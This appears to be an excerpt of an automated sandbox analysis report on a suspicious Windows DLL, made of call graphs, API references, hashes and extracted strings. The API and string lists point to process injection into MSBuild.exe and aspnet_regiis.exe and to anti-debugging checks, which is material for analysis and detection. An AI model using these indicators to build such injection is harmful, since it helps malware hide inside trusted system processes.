6ce3155d 12544->12545 12550 6ce315d5 IsProcessorFeaturePresent 12544->12550 12545->12513 12547 6ce315a7 12548 6ce31544 ___std_exception_copy 25 API calls 12547->12548 12549 6ce315b4 12548->12549 
12549->12513 12551 6ce315e1 12550->12551 12554 6ce313fc 12551->12554 12555 6ce31418 __DllMainCRTStartup@12 std::bad_exception::bad_exception 12554->12555 12556 6ce31444 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12555->12556 12559 6ce31515 __DllMainCRTStartup@12 12556->12559 12557 6ce2e610 _ValidateLocalCookies 5 API calls 12558 6ce31533 GetCurrentProcess TerminateProcess 12557->12558 12558->12547 12559->12557 12561 6ce32a6f 12560->12561 12565 6ce32a75 12560->12565 12563 6ce3454f __dosmaperr 6 API calls 12561->12563 12562 6ce3458e __dosmaperr 6 API calls 12564 6ce32a8f 12562->12564 12563->12565 12566 6ce32a7b 12564->12566 12567 6ce32dde __dosmaperr 14 API calls 12564->12567 12565->12562 12565->12566 12573 6ce32af4 12566->12573 12604 6ce3248b 12566->12604 12569 6ce32a9f 12567->12569 12571 6ce32aa7 12569->12571 12572 6ce32abc 12569->12572 12574 6ce3458e __dosmaperr 6 API calls 12571->12574 12575 6ce3458e __dosmaperr 6 API calls 12572->12575 12585 6ce33b74 12573->12585 12576 6ce32ab3 12574->12576 12577 6ce32ac8 12575->12577 12581 6ce32ce7 _free 14 API calls 12576->12581 12578 6ce32adb 12577->12578 12579 6ce32acc 12577->12579 12580 6ce327a9 __dosmaperr 14 API calls 12578->12580 12582 6ce3458e __dosmaperr 6 API calls 12579->12582 12583 6ce32ae6 12580->12583 12581->12566 12582->12576 12584 6ce32ce7 _free 14 API calls 12583->12584 12584->12566 12693 6ce33c88 12585->12693 12615 6ce34a82 12604->12615 12607 6ce3249b 12609 6ce324c4 12607->12609 12610 6ce324a5 IsProcessorFeaturePresent 12607->12610 12645 6ce31bd8 12609->12645 12611 6ce324b1 12610->12611 12614 6ce313fc __fassign 8 API calls 12611->12614 12614->12609 12648 6ce349b4 12615->12648 12618 6ce34ac7 12619 6ce34ad3 ___scrt_is_nonwritable_in_current_image 12618->12619 12620 6ce32afe __dosmaperr 14 API calls 12619->12620 12624 6ce34b00 __fassign 12619->12624 12625 6ce34afa __fassign 12619->12625 12620->12625 12621 6ce34b47 12622 6ce32dcb _free 14 API calls 12621->12622 12623 6ce34b4c 
12622->12623 12626 6ce315a8 ___std_exception_copy 25 API calls 12623->12626 12627 6ce34b73 12624->12627 12659 6ce32c3a EnterCriticalSection 12624->12659 12625->12621 12625->12624 12644 6ce34b31 12625->12644 12626->12644 12630 6ce34ca6 12627->12630 12631 6ce34bb5 12627->12631 12641 6ce34be4 12627->12641 12633 6ce34cb1 12630->12633 12691 6ce32c82 LeaveCriticalSection 12630->12691 12631->12641 12660 6ce329a7 GetLastError 12631->12660 12635 6ce31bd8 __fassign 23 API calls 12633->12635 12637 6ce34cb9 12635->12637 12637->12607 12638 6ce329a7 __fassign 37 API calls 12642 6ce34c39 12638->12642 12640 6ce329a7 __fassign 37 API calls 12640->12641 12687 6ce34c53 12641->12687 12643 6ce329a7 __fassign 37 API calls 12642->12643 12642->12644 12643->12644 12644->12607 12646 6ce31a7e __DllMainCRTStartup@12 23 API calls 12645->12646 12647 6ce31be9 12646->12647 12649 6ce349c0 ___scrt_is_nonwritable_in_current_image 12648->12649 12654 6ce32c3a EnterCriticalSection 12649->12654 12651 6ce349ce 12655 6ce34a0c 12651->12655 12654->12651 12658 6ce32c82 LeaveCriticalSection 12655->12658 12657 6ce32490 12657->12607 12657->12618 12658->12657 12659->12627 12661 6ce329c4 12660->12661 12662 6ce329be 12660->12662 12663 6ce3458e __dosmaperr 6 API calls 12661->12663 12686 6ce329ca SetLastError 12661->12686 12664 6ce3454f __dosmaperr 6 API calls 12662->12664 12665 6ce329e2 12663->12665 12664->12661 12666 6ce32dde __dosmaperr 14 API calls 12665->12666 12665->12686 12668 6ce329f2 12666->12668 12669 6ce32a11 12668->12669 12670 6ce329fa 12668->12670 12675 6ce3458e __dosmaperr 6 API calls 12669->12675 12673 6ce3458e __dosmaperr 6 API calls 12670->12673 12671 6ce32a58 12671->12640 12672 6ce32a5e 12674 6ce3248b __fassign 35 API calls 12672->12674 12677 6ce32a08 12673->12677 12678 6ce32a63 12674->12678 12676 6ce32a1d 12675->12676 12679 6ce32a32 12676->12679 12680 6ce32a21 12676->12680 12683 6ce32ce7 _free 14 API calls 12677->12683 12682 6ce327a9 __dosmaperr 14 API calls 12679->12682 12681 6ce3458e __dosmaperr 
6 API calls 12680->12681 12681->12677 12684 6ce32a3d 12682->12684 12683->12686 12685 6ce32ce7 _free 14 API calls 12684->12685 12685->12686 12686->12671 12686->12672 12688 6ce34c2a 12687->12688 12689 6ce34c59 12687->12689 12688->12638 12688->12642 12688->12644 12692 6ce32c82 LeaveCriticalSection 12689->12692 12691->12633 12692->12688 12694 6ce33c94 ___scrt_is_nonwritable_in_current_image 12693->12694 12695 6ce33cae 12694->12695 12737 6ce32c3a EnterCriticalSection 12694->12737 12697 6ce33b87 12695->12697 12700 6ce3248b __fassign 37 API calls 12695->12700 12704 6ce3391e 12697->12704 12698 6ce33cea 12738 6ce33d07 12698->12738 12701 6ce33d27 12700->12701 12702 6ce33cbe 12702->12698 12703 6ce32ce7 _free 14 API calls 12702->12703 12703->12698 12742 6ce324cf 12704->12742 12737->12702 12741 6ce32c82 LeaveCriticalSection 12738->12741 12740 6ce33d0e 12740->12695 12741->12740 12743 6ce324ef 12742->12743 12744 6ce329a7 __fassign 37 API calls 12743->12744 12745 6ce3250f 12744->12745 12749 6ce3523e 12745->12749 12750 6ce35251 12749->12750 12751 6ce32525 12749->12751 12750->12751 12757 6ce3564c 12750->12757 12753 6ce3526b 12751->12753 12754 6ce35293 12753->12754 12755 6ce3527e 12753->12755 12755->12754 12779 6ce33d70 12755->12779 12758 6ce35658 ___scrt_is_nonwritable_in_current_image 12757->12758 12759 6ce329a7 __fassign 37 API calls 12758->12759 12760 6ce35661 12759->12760 12767 6ce356a7 12760->12767 12770 6ce32c3a EnterCriticalSection 12760->12770 12762 6ce3567f 12771 6ce356cd 12762->12771 12767->12751 12768 6ce3248b __fassign 37 API calls 12769 6ce356cc 12768->12769 12770->12762 12772 6ce356db __dosmaperr 12771->12772 12774 6ce35690 12771->12774 12773 6ce35400 __dosmaperr 14 API calls 12772->12773 12772->12774 12773->12774 12775 6ce356ac 12774->12775 12778 6ce32c82 LeaveCriticalSection 12775->12778 12777 6ce356a3 12777->12767 12777->12768 12778->12777 12780 6ce329a7 __fassign 37 API calls 12779->12780 12781 6ce33d7a 12780->12781 12782 6ce33c88 __fassign 37 API calls 
12781->12782 12783 6ce33d80 12782->12783 12783->12754 12939 6ce32db8 12908->12939 12910 6ce32da0 _free 12911 6ce32dcb _free 14 API calls 12910->12911 12912 6ce32db3 12911->12912 12912->12525 12914 6ce324cf __fassign 37 API calls 12913->12914 12915 6ce334fa 12914->12915 12916 6ce3350c 12915->12916 12942 6ce344b2 12915->12942 12918 6ce3366d 12916->12918 12919 6ce3367a 12918->12919 12920 6ce33689 12918->12920 12919->12525 12921 6ce33691 12920->12921 12922 6ce336b6 12920->12922 12921->12919 12948 6ce33734 12921->12948 12923 6ce340fb ___scrt_uninitialize_crt WideCharToMultiByte 12922->12923 12925 6ce336c6 12923->12925 12926 6ce336e3 12925->12926 12927 6ce336cd GetLastError 12925->12927 12930 6ce33734 14 API calls 12926->12930 12933 6ce336f4 12926->12933 12928 6ce32d95 __dosmaperr 14 API calls 12927->12928 12929 6ce336d9 12928->12929 12932 6ce32dcb _free 14 API calls 12929->12932 12930->12933 12931 6ce340fb ___scrt_uninitialize_crt WideCharToMultiByte 12934 6ce3370c 12931->12934 12932->12919 12933->12919 12933->12931 12934->12919 12935 6ce33713 GetLastError 12934->12935 12936 6ce32d95 __dosmaperr 14 API calls 12935->12936 12937 6ce3371f 12936->12937 12938 6ce32dcb _free 14 API calls 12937->12938 12938->12919 12940 6ce32afe __dosmaperr 14 API calls 12939->12940 12941 6ce32dbd 12940->12941 12941->12910 12945 6ce342da 12942->12945 12946 6ce343ef __dosmaperr 5 API calls 12945->12946 12947 6ce342f0 12946->12947 12947->12916 12949 6ce3373f 12948->12949 12950 6ce32dcb _free 14 API calls 12949->12950 12951 6ce33748 12950->12951 12951->12919 12955 6ce33ff7 12952->12955 12956 6ce324cf __fassign 37 API calls 12955->12956 12957 6ce3400b 12956->12957 12957->12532 12958 6ce32074 12959 6ce32086 12958->12959 12960 6ce3208c 12958->12960 12962 6ce3201c 12959->12962 12963 6ce32029 12962->12963 12964 6ce32046 12962->12964 12965 6ce32040 12963->12965 12967 6ce32ce7 _free 14 API calls 12963->12967 12964->12960 12966 6ce32ce7 _free 14 API calls 12965->12966 12966->12964 12967->12963 13155 
6ce322da 13158 6ce32360 13155->13158 13159 6ce322ed 13158->13159 13160 6ce32374 13158->13160 13160->13159 13161 6ce32ce7 _free 14 API calls 13160->13161 13161->13159 12968 6ce32bf9 12970 6ce32c04 12968->12970 12971 6ce32c2d 12970->12971 12972 6ce32c29 12970->12972 12974 6ce345d0 12970->12974 12979 6ce32c51 12971->12979 12975 6ce343ef __dosmaperr 5 API calls 12974->12975 12976 6ce345ec 12975->12976 12977 6ce3460a InitializeCriticalSectionAndSpinCount 12976->12977 12978 6ce345f5 12976->12978 12977->12978 12978->12970 12980 6ce32c7d 12979->12980 12981 6ce32c5e 12979->12981 12980->12972 12982 6ce32c68 DeleteCriticalSection 12981->12982 12982->12980 12982->12982 13162 6ce2f318 13163 6ce27100 std::bad_exception::bad_exception 25 API calls 13162->13163 13164 6ce2f326 13163->13164 12983 6ce2f37e 12986 6ce2fb8f 12983->12986 12985 6ce2f393 12987 6ce2fba3 12986->12987 12988 6ce2fb9c 12986->12988 12987->12985 12989 6ce3173e ___vcrt_freefls@4 14 API calls 12988->12989 12989->12987 12990 6cdfc480 13008 6ce0ded0 12990->13008 12993 6ce0ded0 26 API calls 12994 6cdfc4d5 12993->12994 12995 6ce0ded0 26 API calls 12994->12995 12996 6cdfc52f 12995->12996 12997 6ce0ded0 26 API calls 12996->12997 12998 6cdfc545 12997->12998 12999 6ce0ded0 26 API calls 12998->12999 13007 6cdfc558 12999->13007 13000 6ce0ded0 26 API calls 13000->13007 13001 6cdfcc6d 13002 6ce2e610 _ValidateLocalCookies 5 API calls 13001->13002 13004 6cdfcc80 13002->13004 13005 6ce0e7b0 25 API calls 13005->13007 13006 6cdf1010 26 API calls 13006->13007 13007->13000 13007->13001 13007->13005 13007->13006 13019 6cdf7370 13007->13019 13012 6ce0df2b 13008->13012 13009 6ce15e30 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13009->13012 13010 6ce16540 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13010->13012 13011 6ce0e5d8 13023 6ce16970 13011->13023 13012->13009 13012->13010 13012->13011 13017 
6ce2e610 _ValidateLocalCookies 5 API calls 13018 6cdfc4bf 13017->13018 13018->12993 13020 6cdf73cb 13019->13020 13021 6ce2e610 _ValidateLocalCookies 5 API calls 13020->13021 13022 6cdf7694 13021->13022 13022->13007 13025 6ce16992 13023->13025 13024 6ce193c0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13024->13025 13025->13024 13026 6ce18000 26 API calls 13025->13026 13027 6ce170b2 13025->13027 13026->13025 13028 6ce2e610 _ValidateLocalCookies 5 API calls 13027->13028 13029 6ce0e5e9 13028->13029 13030 6ce17300 13029->13030 13033 6ce17354 13030->13033 13031 6ce2e610 _ValidateLocalCookies 5 API calls 13032 6ce0e5f1 13031->13032 13032->13017 13033->13031
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Virtual$MemoryThread$Write$Create$ContextWindow$AllocateCloseConsoleHandleProcessResumeShow$AllocRead
                                                                                                                                                                                                                                              • String ID: d;$d;$#K>&$)LE$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$I1Z$I1Z$MZx$jW}0$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                                              • API String ID: 2147668725-4089158577
                                                                                                                                                                                                                                              • Opcode ID: c94654091b746611dffebff9f4227d955ad4bc2d63b432ad0c1136e1922cdcf7
                                                                                                                                                                                                                                              • Instruction ID: 94032c548869c16c82a1d1955f563656fbf862707214fb2684946fe3fed0d9d0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c94654091b746611dffebff9f4227d955ad4bc2d63b432ad0c1136e1922cdcf7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAE31236B416158FCB08CE3CC9957CE77F2AB4B314F205699D416DBB94D23A8A4ACF81
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Handle$Close$FileModule$NameProtectVirtual$CurrentProcess$CreateInformationView
                                                                                                                                                                                                                                              • String ID: 0J<($>'+9$>'+9$@$S$jV&$jV&$nlB[$t>6N$v(R$v(R$v'{
                                                                                                                                                                                                                                              • API String ID: 395468248-1931959953
                                                                                                                                                                                                                                              • Opcode ID: 6126a30d70bf8e52fb887b6cdccde43bc0b342269f0c2ad9eee2afc75a8dcfe5
                                                                                                                                                                                                                                              • Instruction ID: 0433d2ff6ce34b4e8b3cebf524076d04935f7f16bcd7456e39b008eb86f5439d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6126a30d70bf8e52fb887b6cdccde43bc0b342269f0c2ad9eee2afc75a8dcfe5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA531376B452508FCB148F3CC9953CA37F2BB87354F214299D465DBBA4D73A8A8ACB40

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 1634 6ce02f70-6ce02fc2 1635 6ce02fc9-6ce02fd4 1634->1635 1636 6ce02fda-6ce02fe7 1635->1636 1637 6ce03d8c-6ce03d9c 1635->1637 1640 6ce03bdb-6ce03beb 1636->1640 1641 6ce02fed-6ce02ffa 1636->1641 1638 6ce03e25 1637->1638 1638->1635 1640->1638 1643 6ce03000-6ce0300d 1641->1643 1644 6ce03e0f-6ce03e19 1641->1644 1646 6ce03013-6ce03020 1643->1646 1647 6ce03dbc-6ce03dc3 1643->1647 1644->1638 1649 6ce03bf0-6ce03bf7 1646->1649 1650 6ce03026-6ce03033 1646->1650 1647->1638 1649->1638 1652 6ce03039-6ce03046 1650->1652 1653 6ce0387c-6ce03883 1650->1653 1655 6ce03775-6ce037c7 1652->1655 1656 6ce0304c-6ce03059 1652->1656 1653->1638 1655->1638 1658 6ce03420-6ce03467 1656->1658 1659 6ce0305f-6ce0306c 1656->1659 1658->1638 1661 6ce03b81-6ce03bca 1659->1661 1662 6ce03072-6ce0307f 1659->1662 1661->1638 1664 6ce035a4-6ce03623 GetModuleHandleW call 6ce00fc0 call 6ce2f3e0 1662->1664 1665 6ce03085-6ce03092 1662->1665 1664->1638 1668 6ce03098-6ce030a5 1665->1668 1669 6ce0389a-6ce03908 1665->1669 1673 6ce03a07-6ce03a75 1668->1673 1674 6ce030ab-6ce030b8 1668->1674 1669->1638 1673->1638 1677 6ce03dc8-6ce03dcf 1674->1677 1678 6ce030be-6ce030cb 1674->1678 1677->1638 1680 6ce03da1-6ce03dab 1678->1680 1681 6ce030d1-6ce030de 1678->1681 1680->1638 1683 6ce030e4-6ce030f1 1681->1683 1684 6ce0366e-6ce036b8 1681->1684 1686 6ce030f7-6ce03104 1683->1686 1687 6ce03bcf-6ce03bd6 1683->1687 1684->1638 1689 6ce03994-6ce03a02 1686->1689 1690 6ce0310a-6ce03117 1686->1690 1687->1638 1689->1638 1692 6ce03ca4-6ce03cbe call 6ce2e610 1690->1692 1693 6ce0311d-6ce0312a 1690->1693 1696 6ce03d80-6ce03d87 1693->1696 1697 6ce03130-6ce0313d 1693->1697 1696->1638 1700 6ce03143-6ce03150 1697->1700 1701 6ce037cc-6ce037d3 1697->1701 1703 6ce03156-6ce03163 1700->1703 1704 
6ce03bfc-6ce03c3d 1700->1704 1701->1638 1706 6ce03169-6ce03176 1703->1706 1707 6ce03e1e 1703->1707 1704->1638 1709 6ce03628-6ce03669 1706->1709 1710 6ce0317c-6ce03189 1706->1710 1707->1638 1709->1638 1712 6ce036c9-6ce036d8 1710->1712 1713 6ce0318f-6ce0319c 1710->1713 1712->1638 1715 6ce031a2-6ce031af 1713->1715 1716 6ce03727-6ce03770 1713->1716 1718 6ce031b5-6ce031c2 1715->1718 1719 6ce03df7-6ce03dfe 1715->1719 1716->1638 1721 6ce03387-6ce033cd 1718->1721 1722 6ce031c8-6ce031d5 1718->1722 1719->1638 1721->1638 1724 6ce03b16-6ce03b7c 1722->1724 1725 6ce031db-6ce031e8 1722->1725 1724->1638 1727 6ce03552-6ce03593 1725->1727 1728 6ce031ee-6ce031fb 1725->1728 1727->1638 1730 6ce03201-6ce0320e 1728->1730 1731 6ce034df-6ce0354d 1728->1731 1733 6ce03d32-6ce03d7b 1730->1733 1734 6ce03214-6ce03221 1730->1734 1731->1638 1733->1638 1736 6ce03c42-6ce03c93 1734->1736 1737 6ce03227-6ce03234 1734->1737 1736->1638 1739 6ce03a7a-6ce03ac3 1737->1739 1740 6ce0323a-6ce03247 1737->1740 1739->1638 1742 6ce03598-6ce0359f 1740->1742 1743 6ce0324d-6ce0325a 1740->1743 1742->1638 1745 6ce03260-6ce0326d 1743->1745 1746 6ce03ac8-6ce03b11 1743->1746 1748 6ce03273-6ce03280 1745->1748 1749 6ce03cbf-6ce03d2d 1745->1749 1746->1638 1751 6ce03286-6ce03293 1748->1751 1752 6ce03c98-6ce03c9f 1748->1752 1749->1638 1754 6ce03299-6ce032a6 1751->1754 1755 6ce0346c-6ce034da 1751->1755 1752->1638 1757 6ce03988-6ce0398f 1754->1757 1758 6ce032ac-6ce032b9 1754->1758 1755->1638 1757->1638 1760 6ce03e03-6ce03e0a 1758->1760 1761 6ce032bf-6ce032cc 1758->1761 1760->1638 1763 6ce032d2-6ce032df 1761->1763 1764 6ce036dd-6ce03722 NtQueryInformationProcess 1761->1764 1766 6ce032e5-6ce032f2 1763->1766 1767 6ce037d8-6ce03821 1763->1767 1764->1638 1769 6ce03888-6ce03895 1766->1769 1770 6ce032f8-6ce03305 1766->1770 1767->1638 1769->1638 1772 6ce03dd4-6ce03dde 1770->1772 1773 6ce0330b-6ce03318 1770->1773 1772->1638 1775 6ce03de3-6ce03df2 1773->1775 1776 6ce0331e-6ce0332b 1773->1776 1775->1638 1778 6ce03331-6ce0333e 1776->1778 
1779 6ce03826-6ce03877 1776->1779 1781 6ce03344-6ce03351 1778->1781 1782 6ce0390d-6ce03983 1778->1782 1779->1638 1784 6ce033d2-6ce0341b 1781->1784 1785 6ce03357-6ce03364 1781->1785 1782->1638 1784->1638 1787 6ce0336a-6ce03377 1785->1787 1788 6ce036bd-6ce036c4 1785->1788 1790 6ce03db0-6ce03db7 1787->1790 1791 6ce0337d-6ce03382 1787->1791 1788->1638 1790->1638 1791->1638
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 6CE0370B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InformationProcessQuery
                                                                                                                                                                                                                                              • String ID: -&dU$0l8$LukB$NtQueryInformationProcess$j.X4$ntdll.dll$f]N$g$g
                                                                                                                                                                                                                                              • API String ID: 1778838933-2710835337
                                                                                                                                                                                                                                              • Opcode ID: 8349c1cb45273ed0dc252d2d768626e359501948a23c7914a975e3e9023a86c5
                                                                                                                                                                                                                                              • Instruction ID: 53b7844f66eccdd1584da7af214f48910405476032452d63077f10830ab5ee7f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8349c1cb45273ed0dc252d2d768626e359501948a23c7914a975e3e9023a86c5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97724436B456018FCF18CEBCD995BCD7BF2AB47355F205619D411EBBA4D72A880B8B80

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 1793 6ce2e7de-6ce2e7f1 call 6ce2f090 1796 6ce2e7f3-6ce2e7f5 1793->1796 1797 6ce2e7f7-6ce2e819 call 6ce2ec78 1793->1797 1799 6ce2e860-6ce2e86f 1796->1799 1801 6ce2e886-6ce2e89f call 6ce2ef12 call 6ce2f090 1797->1801 1802 6ce2e81b-6ce2e85e call 6ce2ed43 call 6ce2ebff call 6ce2f061 call 6ce2e873 call 6ce2eee4 call 6ce2e880 1797->1802 1814 6ce2e8b0-6ce2e8b7 1801->1814 1815 6ce2e8a1-6ce2e8a7 1801->1815 1802->1799 1818 6ce2e8c3-6ce2e8d7 dllmain_raw 1814->1818 1819 6ce2e8b9-6ce2e8bc 1814->1819 1815->1814 1817 6ce2e8a9-6ce2e8ab 1815->1817 1824 6ce2e989-6ce2e998 1817->1824 1821 6ce2e980-6ce2e987 1818->1821 1822 6ce2e8dd-6ce2e8ee dllmain_crt_dispatch 1818->1822 1819->1818 1820 6ce2e8be-6ce2e8c1 1819->1820 1825 6ce2e8f4-6ce2e906 call 6ce0c950 1820->1825 1821->1824 1822->1821 1822->1825 1831 6ce2e908-6ce2e90a 1825->1831 1832 6ce2e92f-6ce2e931 1825->1832 1831->1832 1834 6ce2e90c-6ce2e92a call 6ce0c950 call 6ce2e7de dllmain_raw 1831->1834 1835 6ce2e933-6ce2e936 1832->1835 1836 6ce2e938-6ce2e949 dllmain_crt_dispatch 1832->1836 1834->1832 1835->1821 1835->1836 1836->1821 1838 6ce2e94b-6ce2e97d dllmain_raw 1836->1838 1838->1821
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6CE2E825
                                                                                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6CE2E83F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: Initialize___scrt_uninitialize_crt
• String ID:
• API String ID: 2442719207-0
• Opcode ID: 47d8a3ed5c2578b2fa9393e1af08dd99a6adae50dac5dfa8e26f9905a7b8502f
• Instruction ID: 6e80ec22f750c0074341f040c98bca1552c9153aca2d081b46ec1cfe3971886d
• Opcode Fuzzy Hash: 47d8a3ed5c2578b2fa9393e1af08dd99a6adae50dac5dfa8e26f9905a7b8502f
• Instruction Fuzzy Hash: 2441DF72E01E39AEEB108FB9C840B9E7A74EB4576AF30055AE85467B50C73C49059BD0

Control-flow Graph (rendered in the interactive report; blocks marked Executed / Not Executed): entry block 6ce2e88e-6ce2e89f; subcalls to 6ce2f090, 6ce0c950 and 6ce2e7de; blocks labelled dllmain_raw and dllmain_crt_dispatch.
APIs
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: dllmain_raw$dllmain_crt_dispatch
• String ID:
• API String ID: 3136044242-0
• Opcode ID: 7f58d659d36c7858edb84b74846c2f5ef8e5884e5f0357126d7aee17d8522da2
• Instruction ID: 896506bce4365e0c36c10ba39cb66f21c6a606b05ad580711363cd7b9a419e8b
• Opcode Fuzzy Hash: 7f58d659d36c7858edb84b74846c2f5ef8e5884e5f0357126d7aee17d8522da2
• Instruction Fuzzy Hash: 6F21E471E01E39AEDB118E75C840FAF3A78EB8579DB31165AF81457B10C3388D019BD0

Control-flow Graph (rendered in the interactive report; blocks marked Executed / Not Executed): entry block 6ce2e6d7-6ce2e6e5; subcalls to 6ce2f090, 6ce2ed73, 6ce2ec78, 6ce2ecd5, 6ce2ef12, 6ce2e7ba, 6ce2f035, 6ce2ebf3, 6ce2ec17, 6ce3179e, 6ce2ef0c, 6ce2ee33, 6ce2ecaa and 6ce31759.
APIs
• __RTC_Initialize.LIBCMT ref: 6CE2E724
  • Part of subcall function 6CE2EBF3: InitializeSListHead.KERNEL32(6CE8DC50,6CE2E72E,6CE3F880,00000010,6CE2E6BF,?,?,?,6CE2E8E7,?,00000001,?,?,00000001,?,6CE3F8C8), ref: 6CE2EBF8
• ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CE2E78E
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
• String ID:
• API String ID: 3231365870-0
• Opcode ID: d24459848af649de417b6f56c094e77db1492ee4744ba3b656a301ef0e6f78b5
• Instruction ID: 52538b7e7801b4e81247636a506a491595e5e31ee6089571e34a67c5fd68fd5e
• Opcode Fuzzy Hash: d24459848af649de417b6f56c094e77db1492ee4744ba3b656a301ef0e6f78b5
• Instruction Fuzzy Hash: 3321B832689B369EEB006BF498057E837719B0222EF30142DD49467BC1DB6E1188C6E1

Control-flow Graph (rendered in the interactive report; blocks marked Executed / Not Executed): entry block 6ce27100-6ce27111; subcalls to 6ce2f3e0 and 6ce2fb2c.
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 6CE27968
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
